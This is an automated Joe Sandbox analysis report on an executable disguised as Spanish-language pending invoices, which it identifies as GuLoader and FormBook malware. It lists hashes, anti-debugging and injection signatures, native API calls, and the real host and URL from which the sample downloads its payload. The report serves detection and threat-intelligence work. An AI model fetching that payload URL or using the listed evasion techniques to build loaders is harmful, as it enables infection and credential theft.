Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe

Overview

General Information

Sample name:FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
Analysis ID:1587320
MD5:4f2c796aebd02a54ca9bebb0c5bc5ef0
SHA1:558e2f3de9077aaf9159c4fb1633d66c75b14dda
SHA256:c2f619460d6cd63ca1ae9b9abec61842fa05f09c0698fc4c400ccd5342109692
Infos:

Detection

FormBook, GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2776555713.0000000032150000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2338207417.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T07:13:13.846740+010028032702Potentially Bad Traffic192.168.2.549796212.162.149.15380TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeVirustotal: Detection: 55%Perma Link
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeReversingLabs: Detection: 42%
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.2776555713.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2427171731.0000000032306000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425080993.000000003215C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2427171731.0000000032306000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425080993.000000003215C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmp
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004065AA FindFirstFileW,FindClose,0_2_004065AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49796 -> 212.162.149.153:80
      Source: global trafficHTTP traffic detected: GET /iXjlIFhRzlkjbZPQm185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.153Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: global trafficHTTP traffic detected: GET /iXjlIFhRzlkjbZPQm185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.153Cache-Control: no-cache
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin(
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binJ
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bink
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error...
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.00000000005F2000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.00000000005F2000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_00404B0B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404B0B

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.2776555713.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325235C0 NtCreateMutant,LdrInitializeThunk,3_2_325235C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522B60 NtClose,LdrInitializeThunk,3_2_32522B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_32522C70
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_32522DF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32523010 NtOpenDirectoryObject,3_2_32523010
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32523090 NtSetValueKey,3_2_32523090
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325239B0 NtGetContextThread,3_2_325239B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32523D70 NtOpenThread,3_2_32523D70
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32523D10 NtOpenProcessToken,3_2_32523D10
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32524340 NtSetContextThread,3_2_32524340
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32524650 NtSuspendThread,3_2_32524650
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522AD0 NtReadFile,3_2_32522AD0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522AF0 NtWriteFile,3_2_32522AF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522AB0 NtWaitForSingleObject,3_2_32522AB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522BF0 NtAllocateVirtualMemory,3_2_32522BF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522BE0 NtQueryValueKey,3_2_32522BE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522B80 NtQueryInformationFile,3_2_32522B80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522BA0 NtEnumerateValueKey,3_2_32522BA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522E30 NtWriteVirtualMemory,3_2_32522E30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522EE0 NtQueueApcThread,3_2_32522EE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522E80 NtReadVirtualMemory,3_2_32522E80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522EA0 NtAdjustPrivilegesToken,3_2_32522EA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522F60 NtCreateProcessEx,3_2_32522F60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522F30 NtCreateSection,3_2_32522F30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522FE0 NtCreateFile,3_2_32522FE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522F90 NtProtectVirtualMemory,3_2_32522F90
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522FB0 NtResumeThread,3_2_32522FB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522FA0 NtQuerySection,3_2_32522FA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522C60 NtCreateKey,3_2_32522C60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522C00 NtQueryInformationProcess,3_2_32522C00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522CC0 NtQueryVirtualMemory,3_2_32522CC0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522CF0 NtOpenProcess,3_2_32522CF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522CA0 NtQueryInformationToken,3_2_32522CA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522D10 NtMapViewOfSection,3_2_32522D10
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522D00 NtSetInformationFile,3_2_32522D00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522D30 NtUnmapViewOfSection,3_2_32522D30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522DD0 NtDelayExecution,3_2_32522DD0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32522DB0 NtEnumerateKey,3_2_32522DB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004043F90_2_004043F9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004070FB0_2_004070FB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_6FA423510_2_6FA42351
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250B2C03_2_3250B2C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325912ED3_2_325912ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F52A03_2_324F52A0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DD34C3_2_324DD34C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A132D3_2_325A132D
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3253739A3_2_3253739A
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C03_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259F0CC3_2_3259F0CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A70E93_2_325A70E9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AF0E03_2_325AF0E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB16B3_2_325BB16B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3252516C3_2_3252516C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF1723_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FB1B03_2_324FB1B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325356303_2_32535630
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC3_2_325A16CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AF7B03_2_325AF7B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E14603_2_324E1460
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AF43F3_2_325AF43F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A75713_2_325A7571
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B95C33_2_325B95C3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258D5B03_2_3258D5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AFA493_2_325AFA49
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A7A463_2_325A7A46
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32563A6C3_2_32563A6C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259DAC63_2_3259DAC6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32535AA03_2_32535AA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258DAAC3_2_3258DAAC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32591AA33_2_32591AA3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AFB763_2_325AFB76
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32565BF03_2_32565BF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3252DBF93_2_3252DBF9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250FB803_2_3250FB80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D8003_2_3255D800
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F38E03_2_324F38E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250B9503_2_3250B950
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F99503_2_324F9950
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325859103_2_32585910
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F9EB03_2_324F9EB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AFF093_2_325AFF09
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324B3FD23_2_324B3FD2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324B3FD53_2_324B3FD5
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1F923_2_324F1F92
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AFFB13_2_325AFFB1
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32569C323_2_32569C32
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AFCF23_2_325AFCF2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A1D5A3_2_325A1D5A
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3D403_2_324F3D40
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A7D733_2_325A7D73
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250FDC03_2_3250FDC0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325902743_2_32590274
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325702C03_2_325702C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325AA3523_2_325AA352
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B03E63_2_325B03E6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FE3F03_2_324FE3F0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325820003_2_32582000
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325781583_2_32578158
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258A1183_2_3258A118
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E01003_2_324E0100
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A81CC3_2_325A81CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B01AA3_2_325B01AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A41A23_2_325A41A2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250C6E03_2_3250C6E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325147503_2_32514750
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F07703_2_324F0770
